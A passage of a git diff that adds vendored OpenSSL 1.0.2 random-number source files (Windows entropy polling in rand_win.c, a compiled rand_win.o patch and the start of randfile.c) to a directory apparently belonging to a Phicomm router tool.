+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#include "rand_lcl.h"
+
+#if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_WIN32)
+# include <windows.h>
+# ifndef _WIN32_WINNT
+#  define _WIN32_WINNT 0x0400
+# endif
+# include <wincrypt.h>
+# include <tlhelp32.h>
+
+/*
+ * Limit the time spent walking through the heap, processes, threads and
+ * modules to a maximum of 1000 miliseconds each, unless CryptoGenRandom
+ * failed
+ */
+# define MAXDELAY 1000
+
+/*
+ * Intel hardware RNG CSP -- available from
+ * http://developer.intel.com/design/security/rng/redist_license.htm
+ */
+# define PROV_INTEL_SEC 22
+# define INTEL_DEF_PROV L"Intel Hardware Cryptographic Service Provider"
+
+static void readtimer(void);
+static void readscreen(void);
+
+/*
+ * It appears like CURSORINFO, PCURSORINFO and LPCURSORINFO are only defined
+ * when WINVER is 0x0500 and up, which currently only happens on Win2000.
+ * Unfortunately, those are typedefs, so they're a little bit difficult to
+ * detect properly.  On the other hand, the macro CURSOR_SHOWING is defined
+ * within the same conditional, so it can be use to detect the absence of
+ * said typedefs.
+ */
+
+# ifndef CURSOR_SHOWING
+/*
+ * Information about the global cursor.
+ */
+typedef struct tagCURSORINFO {
+    DWORD cbSize;
+    DWORD flags;
+    HCURSOR hCursor;
+    POINT ptScreenPos;
+} CURSORINFO, *PCURSORINFO, *LPCURSORINFO;
+
+#  define CURSOR_SHOWING     0x00000001
+# endif                         /* CURSOR_SHOWING */
+
+# if !defined(OPENSSL_SYS_WINCE)
+typedef BOOL(WINAPI *CRYPTACQUIRECONTEXTW) (HCRYPTPROV *, LPCWSTR, LPCWSTR,
+                                            DWORD, DWORD);
+typedef BOOL(WINAPI *CRYPTGENRANDOM) (HCRYPTPROV, DWORD, BYTE *);
+typedef BOOL(WINAPI *CRYPTRELEASECONTEXT) (HCRYPTPROV, DWORD);
+
+typedef HWND(WINAPI *GETFOREGROUNDWINDOW) (VOID);
+typedef BOOL(WINAPI *GETCURSORINFO) (PCURSORINFO);
+typedef DWORD(WINAPI *GETQUEUESTATUS) (UINT);
+
+typedef HANDLE(WINAPI *CREATETOOLHELP32SNAPSHOT) (DWORD, DWORD);
+typedef BOOL(WINAPI *CLOSETOOLHELP32SNAPSHOT) (HANDLE);
+typedef BOOL(WINAPI *HEAP32FIRST) (LPHEAPENTRY32, DWORD, size_t);
+typedef BOOL(WINAPI *HEAP32NEXT) (LPHEAPENTRY32);
+typedef BOOL(WINAPI *HEAP32LIST) (HANDLE, LPHEAPLIST32);
+typedef BOOL(WINAPI *PROCESS32) (HANDLE, LPPROCESSENTRY32);
+typedef BOOL(WINAPI *THREAD32) (HANDLE, LPTHREADENTRY32);
+typedef BOOL(WINAPI *MODULE32) (HANDLE, LPMODULEENTRY32);
+
+#  include <lmcons.h>
+#  include <lmstats.h>
+#  if 1
+/*
+ * The NET API is Unicode only.  It requires the use of the UNICODE macro.
+ * When UNICODE is defined LPTSTR becomes LPWSTR.  LMSTR was was added to the
+ * Platform SDK to allow the NET API to be used in non-Unicode applications
+ * provided that Unicode strings were still used for input.  LMSTR is defined
+ * as LPWSTR.
+ */
+typedef NET_API_STATUS(NET_API_FUNCTION *NETSTATGET)
+ (LPWSTR, LPWSTR, DWORD, DWORD, LPBYTE *);
+typedef NET_API_STATUS(NET_API_FUNCTION *NETFREE) (LPBYTE);
+#  endif                        /* 1 */
+# endif                         /* !OPENSSL_SYS_WINCE */
+
+int RAND_poll(void)
+{
+    MEMORYSTATUS m;
+    HCRYPTPROV hProvider = 0;
+    DWORD w;
+    int good = 0;
+
+# if defined(OPENSSL_SYS_WINCE)
+#  if defined(_WIN32_WCE) && _WIN32_WCE>=300
+    /*
+     * Even though MSDN says _WIN32_WCE>=210, it doesn't seem to be available
+     * in commonly available implementations prior 300...
+     */
+    {
+        BYTE buf[64];
+        /* poll the CryptoAPI PRNG */
+        /* The CryptoAPI returns sizeof(buf) bytes of randomness */
+        if (CryptAcquireContextW(&hProvider, NULL, NULL, PROV_RSA_FULL,
+                                 CRYPT_VERIFYCONTEXT)) {
+            if (CryptGenRandom(hProvider, sizeof(buf), buf))
+                RAND_add(buf, sizeof(buf), sizeof(buf));
+            CryptReleaseContext(hProvider, 0);
+        }
+    }
+#  endif
+# else                          /* OPENSSL_SYS_WINCE */
+    /*
+     * None of below libraries are present on Windows CE, which is
+     * why we #ifndef the whole section. This also excuses us from
+     * handling the GetProcAddress issue. The trouble is that in
+     * real Win32 API GetProcAddress is available in ANSI flavor
+     * only. In WinCE on the other hand GetProcAddress is a macro
+     * most commonly defined as GetProcAddressW, which accepts
+     * Unicode argument. If we were to call GetProcAddress under
+     * WinCE, I'd recommend to either redefine GetProcAddress as
+     * GetProcAddressA (there seem to be one in common CE spec) or
+     * implement own shim routine, which would accept ANSI argument
+     * and expand it to Unicode.
+     */
+    {
+        /* load functions dynamically - not available on all systems */
+        HMODULE advapi = LoadLibrary(TEXT("ADVAPI32.DLL"));
+        HMODULE kernel = LoadLibrary(TEXT("KERNEL32.DLL"));
+        HMODULE user = NULL;
+        HMODULE netapi = LoadLibrary(TEXT("NETAPI32.DLL"));
+        CRYPTACQUIRECONTEXTW acquire = NULL;
+        CRYPTGENRANDOM gen = NULL;
+        CRYPTRELEASECONTEXT release = NULL;
+        NETSTATGET netstatget = NULL;
+        NETFREE netfree = NULL;
+        BYTE buf[64];
+
+        if (netapi) {
+            netstatget =
+                (NETSTATGET) GetProcAddress(netapi, "NetStatisticsGet");
+            netfree = (NETFREE) GetProcAddress(netapi, "NetApiBufferFree");
+        }
+
+        if (netstatget && netfree) {
+            LPBYTE outbuf;
+            /*
+             * NetStatisticsGet() is a Unicode only function
+             * STAT_WORKSTATION_0 contains 45 fields and STAT_SERVER_0
+             * contains 17 fields.  We treat each field as a source of one
+             * byte of entropy.
+             */
+
+            if (netstatget(NULL, L"LanmanWorkstation", 0, 0, &outbuf) == 0) {
+                RAND_add(outbuf, sizeof(STAT_WORKSTATION_0), 45);
+                netfree(outbuf);
+            }
+            if (netstatget(NULL, L"LanmanServer", 0, 0, &outbuf) == 0) {
+                RAND_add(outbuf, sizeof(STAT_SERVER_0), 17);
+                netfree(outbuf);
+            }
+        }
+
+        if (netapi)
+            FreeLibrary(netapi);
+
+        /*
+         * It appears like this can cause an exception deep within
+         * ADVAPI32.DLL at random times on Windows 2000.  Reported by Jeffrey
+         * Altman. Only use it on NT.
+         */
+
+        if (advapi) {
+            /*
+             * If it's available, then it's available in both ANSI
+             * and UNICODE flavors even in Win9x, documentation says.
+             * We favor Unicode...
+             */
+            acquire = (CRYPTACQUIRECONTEXTW) GetProcAddress(advapi,
+                                                            "CryptAcquireContextW");
+            gen = (CRYPTGENRANDOM) GetProcAddress(advapi, "CryptGenRandom");
+            release = (CRYPTRELEASECONTEXT) GetProcAddress(advapi,
+                                                           "CryptReleaseContext");
+        }
+
+        if (acquire && gen && release) {
+            /* poll the CryptoAPI PRNG */
+            /* The CryptoAPI returns sizeof(buf) bytes of randomness */
+            if (acquire(&hProvider, NULL, NULL, PROV_RSA_FULL,
+                        CRYPT_VERIFYCONTEXT)) {
+                if (gen(hProvider, sizeof(buf), buf) != 0) {
+                    RAND_add(buf, sizeof(buf), 0);
+                    good = 1;
+#  if 0
+                    printf("randomness from PROV_RSA_FULL\n");
+#  endif
+                }
+                release(hProvider, 0);
+            }
+
+            /* poll the Pentium PRG with CryptoAPI */
+            if (acquire(&hProvider, 0, INTEL_DEF_PROV, PROV_INTEL_SEC, 0)) {
+                if (gen(hProvider, sizeof(buf), buf) != 0) {
+                    RAND_add(buf, sizeof(buf), sizeof(buf));
+                    good = 1;
+#  if 0
+                    printf("randomness from PROV_INTEL_SEC\n");
+#  endif
+                }
+                release(hProvider, 0);
+            }
+        }
+
+        if (advapi)
+            FreeLibrary(advapi);
+
+        if ((!check_winnt() ||
+             !OPENSSL_isservice()) &&
+            (user = LoadLibrary(TEXT("USER32.DLL")))) {
+            GETCURSORINFO cursor;
+            GETFOREGROUNDWINDOW win;
+            GETQUEUESTATUS queue;
+
+            win =
+                (GETFOREGROUNDWINDOW) GetProcAddress(user,
+                                                     "GetForegroundWindow");
+            cursor = (GETCURSORINFO) GetProcAddress(user, "GetCursorInfo");
+            queue = (GETQUEUESTATUS) GetProcAddress(user, "GetQueueStatus");
+
+            if (win) {
+                /* window handle */
+                HWND h = win();
+                RAND_add(&h, sizeof(h), 0);
+            }
+            if (cursor) {
+                /*
+                 * unfortunately, its not safe to call GetCursorInfo() on NT4
+                 * even though it exists in SP3 (or SP6) and higher.
+                 */
+                if (check_winnt() && !check_win_minplat(5))
+                    cursor = 0;
+            }
+            if (cursor) {
+                /* cursor position */
+                /* assume 2 bytes of entropy */
+                CURSORINFO ci;
+                ci.cbSize = sizeof(CURSORINFO);
+                if (cursor(&ci))
+                    RAND_add(&ci, ci.cbSize, 2);
+            }
+
+            if (queue) {
+                /* message queue status */
+                /* assume 1 byte of entropy */
+                w = queue(QS_ALLEVENTS);
+                RAND_add(&w, sizeof(w), 1);
+            }
+
+            FreeLibrary(user);
+        }
+
+        /*-
+         * Toolhelp32 snapshot: enumerate processes, threads, modules and heap
+         * http://msdn.microsoft.com/library/psdk/winbase/toolhelp_5pfd.htm
+         * (Win 9x and 2000 only, not available on NT)
+         *
+         * This seeding method was proposed in Peter Gutmann, Software
+         * Generation of Practically Strong Random Numbers,
+         * http://www.usenix.org/publications/library/proceedings/sec98/gutmann.html
+         * revised version at http://www.cryptoengines.com/~peter/06_random.pdf
+         * (The assignment of entropy estimates below is arbitrary, but based
+         * on Peter's analysis the full poll appears to be safe. Additional
+         * interactive seeding is encouraged.)
+         */
+
+        if (kernel) {
+            CREATETOOLHELP32SNAPSHOT snap;
+            CLOSETOOLHELP32SNAPSHOT close_snap;
+            HANDLE handle;
+
+            HEAP32FIRST heap_first;
+            HEAP32NEXT heap_next;
+            HEAP32LIST heaplist_first, heaplist_next;
+            PROCESS32 process_first, process_next;
+            THREAD32 thread_first, thread_next;
+            MODULE32 module_first, module_next;
+
+            HEAPLIST32 hlist;
+            HEAPENTRY32 hentry;
+            PROCESSENTRY32 p;
+            THREADENTRY32 t;
+            MODULEENTRY32 m;
+            DWORD starttime = 0;
+
+            snap = (CREATETOOLHELP32SNAPSHOT)
+                GetProcAddress(kernel, "CreateToolhelp32Snapshot");
+            close_snap = (CLOSETOOLHELP32SNAPSHOT)
+                GetProcAddress(kernel, "CloseToolhelp32Snapshot");
+            heap_first = (HEAP32FIRST) GetProcAddress(kernel, "Heap32First");
+            heap_next = (HEAP32NEXT) GetProcAddress(kernel, "Heap32Next");
+            heaplist_first =
+                (HEAP32LIST) GetProcAddress(kernel, "Heap32ListFirst");
+            heaplist_next =
+                (HEAP32LIST) GetProcAddress(kernel, "Heap32ListNext");
+            process_first =
+                (PROCESS32) GetProcAddress(kernel, "Process32First");
+            process_next =
+                (PROCESS32) GetProcAddress(kernel, "Process32Next");
+            thread_first = (THREAD32) GetProcAddress(kernel, "Thread32First");
+            thread_next = (THREAD32) GetProcAddress(kernel, "Thread32Next");
+            module_first = (MODULE32) GetProcAddress(kernel, "Module32First");
+            module_next = (MODULE32) GetProcAddress(kernel, "Module32Next");
+
+            if (snap && heap_first && heap_next && heaplist_first &&
+                heaplist_next && process_first && process_next &&
+                thread_first && thread_next && module_first &&
+                module_next && (handle = snap(TH32CS_SNAPALL, 0))
+                != INVALID_HANDLE_VALUE) {
+                /* heap list and heap walking */
+                /*
+                 * HEAPLIST32 contains 3 fields that will change with each
+                 * entry.  Consider each field a source of 1 byte of entropy.
+                 * HEAPENTRY32 contains 5 fields that will change with each
+                 * entry.  Consider each field a source of 1 byte of entropy.
+                 */
+                ZeroMemory(&hlist, sizeof(HEAPLIST32));
+                hlist.dwSize = sizeof(HEAPLIST32);
+                if (good)
+                    starttime = GetTickCount();
+#  ifdef _MSC_VER
+                if (heaplist_first(handle, &hlist)) {
+                    /*
+                     * following discussion on dev ML, exception on WinCE (or
+                     * other Win platform) is theoretically of unknown
+                     * origin; prevent infinite loop here when this
+                     * theoretical case occurs; otherwise cope with the
+                     * expected (MSDN documented) exception-throwing
+                     * behaviour of Heap32Next() on WinCE.
+                     *
+                     * based on patch in original message by Tanguy Fautré
+                     * (2009/03/02) Subject: RAND_poll() and
+                     * CreateToolhelp32Snapshot() stability
+                     */
+                    int ex_cnt_limit = 42;
+                    do {
+                        RAND_add(&hlist, hlist.dwSize, 3);
+                        __try {
+                            ZeroMemory(&hentry, sizeof(HEAPENTRY32));
+                            hentry.dwSize = sizeof(HEAPENTRY32);
+                            if (heap_first(&hentry,
+                                           hlist.th32ProcessID,
+                                           hlist.th32HeapID)) {
+                                int entrycnt = 80;
+                                do
+                                    RAND_add(&hentry, hentry.dwSize, 5);
+                                while (heap_next(&hentry)
+                                       && (!good
+                                           || (GetTickCount() - starttime) <
+                                           MAXDELAY)
+                                       && --entrycnt > 0);
+                            }
+                        }
+                        __except(EXCEPTION_EXECUTE_HANDLER) {
+                            /*
+                             * ignore access violations when walking the heap
+                             * list
+                             */
+                            ex_cnt_limit--;
+                        }
+                    } while (heaplist_next(handle, &hlist)
+                             && (!good
+                                 || (GetTickCount() - starttime) < MAXDELAY)
+                             && ex_cnt_limit > 0);
+                }
+#  else
+                if (heaplist_first(handle, &hlist)) {
+                    do {
+                        RAND_add(&hlist, hlist.dwSize, 3);
+                        hentry.dwSize = sizeof(HEAPENTRY32);
+                        if (heap_first(&hentry,
+                                       hlist.th32ProcessID,
+                                       hlist.th32HeapID)) {
+                            int entrycnt = 80;
+                            do
+                                RAND_add(&hentry, hentry.dwSize, 5);
+                            while (heap_next(&hentry)
+                                   && --entrycnt > 0);
+                        }
+                    } while (heaplist_next(handle, &hlist)
+                             && (!good
+                                 || (GetTickCount() - starttime) < MAXDELAY));
+                }
+#  endif
+
+                /* process walking */
+                /*
+                 * PROCESSENTRY32 contains 9 fields that will change with
+                 * each entry.  Consider each field a source of 1 byte of
+                 * entropy.
+                 */
+                p.dwSize = sizeof(PROCESSENTRY32);
+
+                if (good)
+                    starttime = GetTickCount();
+                if (process_first(handle, &p))
+                    do
+                        RAND_add(&p, p.dwSize, 9);
+                    while (process_next(handle, &p)
+                           && (!good
+                               || (GetTickCount() - starttime) < MAXDELAY));
+
+                /* thread walking */
+                /*
+                 * THREADENTRY32 contains 6 fields that will change with each
+                 * entry.  Consider each field a source of 1 byte of entropy.
+                 */
+                t.dwSize = sizeof(THREADENTRY32);
+                if (good)
+                    starttime = GetTickCount();
+                if (thread_first(handle, &t))
+                    do
+                        RAND_add(&t, t.dwSize, 6);
+                    while (thread_next(handle, &t)
+                           && (!good
+                               || (GetTickCount() - starttime) < MAXDELAY));
+
+                /* module walking */
+                /*
+                 * MODULEENTRY32 contains 9 fields that will change with each
+                 * entry.  Consider each field a source of 1 byte of entropy.
+                 */
+                m.dwSize = sizeof(MODULEENTRY32);
+                if (good)
+                    starttime = GetTickCount();
+                if (module_first(handle, &m))
+                    do
+                        RAND_add(&m, m.dwSize, 9);
+                    while (module_next(handle, &m)
+                           && (!good
+                               || (GetTickCount() - starttime) < MAXDELAY));
+                if (close_snap)
+                    close_snap(handle);
+                else
+                    CloseHandle(handle);
+
+            }
+
+            FreeLibrary(kernel);
+        }
+    }
+# endif                         /* !OPENSSL_SYS_WINCE */
+
+    /* timer data */
+    readtimer();
+
+    /* memory usage statistics */
+    GlobalMemoryStatus(&m);
+    RAND_add(&m, sizeof(m), 1);
+
+    /* process ID */
+    w = GetCurrentProcessId();
+    RAND_add(&w, sizeof(w), 1);
+
+# if 0
+    printf("Exiting RAND_poll\n");
+# endif
+
+    return (1);
+}
+
+int RAND_event(UINT iMsg, WPARAM wParam, LPARAM lParam)
+{
+    double add_entropy = 0;
+
+    switch (iMsg) {
+    case WM_KEYDOWN:
+        {
+            static WPARAM key;
+            if (key != wParam)
+                add_entropy = 0.05;
+            key = wParam;
+        }
+        break;
+    case WM_MOUSEMOVE:
+        {
+            static int lastx, lasty, lastdx, lastdy;
+            int x, y, dx, dy;
+
+            x = LOWORD(lParam);
+            y = HIWORD(lParam);
+            dx = lastx - x;
+            dy = lasty - y;
+            if (dx != 0 && dy != 0 && dx - lastdx != 0 && dy - lastdy != 0)
+                add_entropy = .2;
+            lastx = x, lasty = y;
+            lastdx = dx, lastdy = dy;
+        }
+        break;
+    }
+
+    readtimer();
+    RAND_add(&iMsg, sizeof(iMsg), add_entropy);
+    RAND_add(&wParam, sizeof(wParam), 0);
+    RAND_add(&lParam, sizeof(lParam), 0);
+
+    return (RAND_status());
+}
+
+void RAND_screen(void)
+{                               /* function available for backward
+                                 * compatibility */
+    RAND_poll();
+    readscreen();
+}
+
+/* feed timing information to the PRNG */
+static void readtimer(void)
+{
+    DWORD w;
+    LARGE_INTEGER l;
+    static int have_perfc = 1;
+# if defined(_MSC_VER) && defined(_M_X86)
+    static int have_tsc = 1;
+    DWORD cyclecount;
+
+    if (have_tsc) {
+        __try {
+            __asm {
+            _emit 0x0f _emit 0x31 mov cyclecount, eax}
+            RAND_add(&cyclecount, sizeof(cyclecount), 1);
+        }
+        __except(EXCEPTION_EXECUTE_HANDLER) {
+            have_tsc = 0;
+        }
+    }
+# else
+#  define have_tsc 0
+# endif
+
+    if (have_perfc) {
+        if (QueryPerformanceCounter(&l) == 0)
+            have_perfc = 0;
+        else
+            RAND_add(&l, sizeof(l), 0);
+    }
+
+    if (!have_tsc && !have_perfc) {
+        w = GetTickCount();
+        RAND_add(&w, sizeof(w), 0);
+    }
+}
+
+/* feed screen contents to PRNG */
+/*****************************************************************************
+ *
+ * Created 960901 by Gertjan van Oosten, gertjan@West.NL, West Consulting B.V.
+ *
+ * Code adapted from
+ * <URL:http://support.microsoft.com/default.aspx?scid=kb;[LN];97193>;
+ * the original copyright message is:
+ *
+ *   (C) Copyright Microsoft Corp. 1993.  All rights reserved.
+ *
+ *   You have a royalty-free right to use, modify, reproduce and
+ *   distribute the Sample Files (and/or any modified version) in
+ *   any way you find useful, provided that you agree that
+ *   Microsoft has no warranty obligations or liability for any
+ *   Sample Application Files which are modified.
+ */
+
+static void readscreen(void)
+{
+# if !defined(OPENSSL_SYS_WINCE) && !defined(OPENSSL_SYS_WIN32_CYGWIN)
+    HDC hScrDC;                 /* screen DC */
+    HBITMAP hBitmap;            /* handle for our bitmap */
+    BITMAP bm;                  /* bitmap properties */
+    unsigned int size;          /* size of bitmap */
+    char *bmbits;               /* contents of bitmap */
+    int w;                      /* screen width */
+    int h;                      /* screen height */
+    int y;                      /* y-coordinate of screen lines to grab */
+    int n = 16;                 /* number of screen lines to grab at a time */
+    BITMAPINFOHEADER bi;        /* info about the bitmap */
+
+    if (check_winnt() && OPENSSL_isservice() > 0)
+        return;
+
+    /* Get a reference to the screen DC */
+    hScrDC = GetDC(NULL);
+
+    /* Get screen resolution */
+    w = GetDeviceCaps(hScrDC, HORZRES);
+    h = GetDeviceCaps(hScrDC, VERTRES);
+
+    /* Create a bitmap compatible with the screen DC */
+    hBitmap = CreateCompatibleBitmap(hScrDC, w, n);
+
+    /* Get bitmap properties */
+    GetObject(hBitmap, sizeof(BITMAP), (LPSTR) & bm);
+    size = (unsigned int)bm.bmWidthBytes * bm.bmHeight * bm.bmPlanes;
+
+    bi.biSize = sizeof(BITMAPINFOHEADER);
+    bi.biWidth = bm.bmWidth;
+    bi.biHeight = bm.bmHeight;
+    bi.biPlanes = bm.bmPlanes;
+    bi.biBitCount = bm.bmBitsPixel;
+    bi.biCompression = BI_RGB;
+    bi.biSizeImage = 0;
+    bi.biXPelsPerMeter = 0;
+    bi.biYPelsPerMeter = 0;
+    bi.biClrUsed = 0;
+    bi.biClrImportant = 0;
+
+    bmbits = OPENSSL_malloc(size);
+    if (bmbits) {
+        /* Now go through the whole screen, repeatedly grabbing n lines */
+        for (y = 0; y < h - n; y += n) {
+            unsigned char md[MD_DIGEST_LENGTH];
+
+            /* Copy the bits of the current line range into the buffer */
+            GetDIBits(hScrDC, hBitmap, y, n,
+                      bmbits, (BITMAPINFO *) & bi, DIB_RGB_COLORS);
+
+            /* Get the hash of the bitmap */
+            MD(bmbits, size, md);
+
+            /* Seed the random generator with the hash value */
+            RAND_add(md, MD_DIGEST_LENGTH, 0);
+        }
+
+        OPENSSL_free(bmbits);
+    }
+
+    /* Clean up */
+    DeleteObject(hBitmap);
+    ReleaseDC(NULL, hScrDC);
+# endif                         /* !OPENSSL_SYS_WINCE */
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_win.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_win.o
new file mode 100644
index 0000000000000000000000000000000000000000..116afc968ed4a0cdd78bd9f3e0911833702afa57
GIT binary patch
literal 1080
zcmbVLO-sW-5S=vj6AyY5yu_1=c1is}^dNy!dlB(c@E}N%29=UcNj7LN`WO5;9{ZR4
z1v-=L;<B51=)mOdynSzWvS~m1H`gu40Tm8h!C$3VfG>><Dms95SOXaJdY9h*Fe<qy
zy$g22{7(10tjg~DvCsU|gPN{;wGlQkmoNvnLudiah;uRj3p&0H-#<+nw{c?XiQOB*
zopYL7O=TNgShh)IT%5>?JmjOt*B8!W09H&>5k`n2ukl%}MDiwpjY1Iui;4nRoTX{P
zk>i<27+y`M5Mex)^%F1IB+n*EE~eIzix4|#qB}L;ESS?w`}~z+7oWtL-z}(i?T6{#
zL&+-UqW&ZFQcoXKk3bfOI*Ds_zQQw&)1_m*(ALVQs6H-MFwI}sL<&5K3g}(+pnj&8
t_CKX)CXsw9iQ1Mt{`0K6qpdqR=!VoOFz4UG4fF0v`yhq)$|%wF{{mZ?IkEr%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randfile.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randfile.c
new file mode 100644
index 0000000..9537c56
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/randfile.c
@@ -0,0 +1,337 @@
+/* crypto/rand/randfile.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* We need to define this to get macros like S_IFBLK and S_IFCHR */
+#if !defined(OPENSSL_SYS_VXWORKS)
+# define _XOPEN_SOURCE 500
+#endif
+
+#include <errno.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "e_os.h"
+#include <openssl/crypto.h>
+#include <openssl/rand.h>
+#include <openssl/buffer.h>
+
+#ifdef OPENSSL_SYS_VMS
+# include <unixio.h>
+#endif
+#ifndef NO_SYS_TYPES_H
+# include <sys/types.h>
+#endif
+#ifndef OPENSSL_NO_POSIX_IO
+# include <sys/stat.h>
+# include <fcntl.h>
+#endif
+
+#ifdef _WIN32
+# define stat    _stat
+# define chmod   _chmod
+# define open    _open
+# define fdopen  _fdopen
+#endif
+
+#undef BUFSIZE
+#define BUFSIZE 1024
+#define RAND_DATA 1024
+
+#ifdef OPENSSL_SYS_VMS
+/*
+ * This declaration is a nasty hack to get around vms' extension to fopen for
+ * passing in sharing options being disabled by our /STANDARD=ANSI89
+ */
+static FILE *(*const vms_fopen)(const char *, const char *, ...) =
+    (FILE *(*)(const char *, const char *, ...))fopen;
+# define VMS_OPEN_ATTRS "shr=get,put,upd,del","ctx=bin,stm","rfm=stm","rat=none","mrs=0"
+#endif
+
+/* #define RFILE ".rnd" - defined in ../../e_os.h */
+
+/*
+ * Note that these functions are intended for seed files only. Entropy
+ * devices and EGD sockets are handled in rand_unix.c
+ */
+
+int RAND_load_file(const char *file, long bytes)
+{
+    /*-
+     * If bytes >= 0, read up to 'bytes' bytes.
+     * if bytes == -1, read complete file.
+     */
+
+    MS_STATIC unsigned char buf[BUFSIZE];
+#ifndef OPENSSL_NO_POSIX_IO
+    struct stat sb;
+#endif
+    int i, ret = 0, n;
+    FILE *in;
+
+    if (file == NULL)
+        return (0);
+
+#ifndef OPENSSL_NO_POSIX_IO
+# ifdef PURIFY
+    /*
+     * struct stat can have padding and unused fields that may not be
+     * initialized in the call to stat(). We need to clear the entire
+     * structure before calling RAND_add() to avoid complaints from
+     * applications such as Valgrind.
+     */
+    memset(&sb, 0, sizeof(sb));
+# endif
+    if (stat(file, &sb) < 0)
+        return (0);
